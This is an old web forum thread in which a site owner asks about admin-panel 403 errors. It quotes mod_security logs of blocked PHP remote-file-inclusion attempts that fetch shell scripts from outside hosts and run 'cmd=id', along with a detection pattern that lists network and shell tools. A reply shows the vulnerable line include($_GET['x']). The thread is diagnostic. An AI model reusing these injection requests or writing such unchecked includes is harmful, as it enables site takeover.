I'm having several problems of 403, access forbidden in my website since months. changing my database values is becoming a nightmare..either with pixelpost 1.6 & phpbb 2.22 (i can post comments, add topics and spammers also can...lol but i can't change settings or else...)


Looking at my log files, i noticed these entries:

[Tue May 22 08:06:36 2007] [error] [client 193.138.204.213] mod_security: Access denied with code 403. Pattern match "!/imp/login\\\\.php" at HEADER("Referer") [id "300018"] [rev "3"] [msg "Generic PHP code injection protection via ARGS"] [severity "CRITICAL"] [hostname "www.ame235.com"] [uri "/index.php?x=http://supercraw.altervista.org/SuPrEmO.txt?"]
[Tue May 22 08:46:15 2007] [error] [client 201.50.202.225] mod_security: Access denied with code 403. Pattern match "!/imp/login\\\\.php" at HEADER("Referer") [id "300018"] [rev "3"] [msg "Generic PHP code injection protection via ARGS"] [severity "CRITICAL"] [hostname "www.ame235.com"] [uri "/index.php?x=http://www.servan.com.br/fotos/scninbox.txt?"]
[Tue May 22 10:53:50 2007] [error] [client 189.0.73.207] mod_security: Access denied with code 403. Pattern match "(\\\\?((LOCAL|INCLUDE|PEAR|SQUIZLIB)_PATH|action|c ontent|dir|name|menu|pm_path|path|pathtoroot|cat|p agina|path|include_location|root|page|gorumDir|sit e|topside|pun_root|open|seite)=(http|https|ftp)\\\ \:/|(cmd|command)=(cd|\\\\;|perl |killall |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |id|cmd|pwd|wget |lwp-(download|request|mirror|rget) |uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\\\\+\\\\+ |\\\\./|whoami|killall |rm \\\\-[a-z|A-Z]))" at REQUEST_URI [severity "EMERGENCY"] [hostname "www.ame235.com"] [uri "http://www.ame235.com/index.php?x=http://www.sirensounddesign.com/mechupa.henrique?&cmd=id"]


those txt files contain php code in javascript style...dunno much of coding but i can understand there are functions to mod permissions CHMOD...
and list files and...and...

so this seems to be dangerous code trying to execute on my website.
this is a error log, that tells me the code has been refused. oky cool.
but i mean maybe before adding the security the code has been executed..

could this be the source of my 403 error problem?
how can i resolve this? (the mod_security works but i would prefer to avoid them on my own!)

thanks for your answers...
Ame235. on Http://www.ame235.com

what I can see is that they try some injection code. They hope they can include their page in that way. With this code this can happen:


include($_GET['x']);


This will include all the files without checking. Pixelpost however does check. With Pixelpost you only include template files of the type HTML. These template files have to exists in a location at your server, more specifically in a location you defined in your adminpanel (if you select a template you select a folder where the files should be). If the files are not there you get a 404, index.php not found error.

So i don't need to worry for that part, pixelpost does the trick.
PErfect.

And what about the 403, access forbidden error i get on trying to save modifications in the admin panel of pixelpost and/or phpBB?
when the "save mods" script tries to access the mysql db, 403 pops out...

Considering that i do have the right db access datas(usr name, pass....)...lol
That i see comments, images, topics & everything...and also that i can add data to db when adding comments in pixelpost and/or phpbb...

Any ideas?

Well it looks like a server issue to me. Please contact your hoster about that.

yeah...just what i was thinking!
Already asked him, i asked here just to be sure i was supposing right.

anyways, THNX !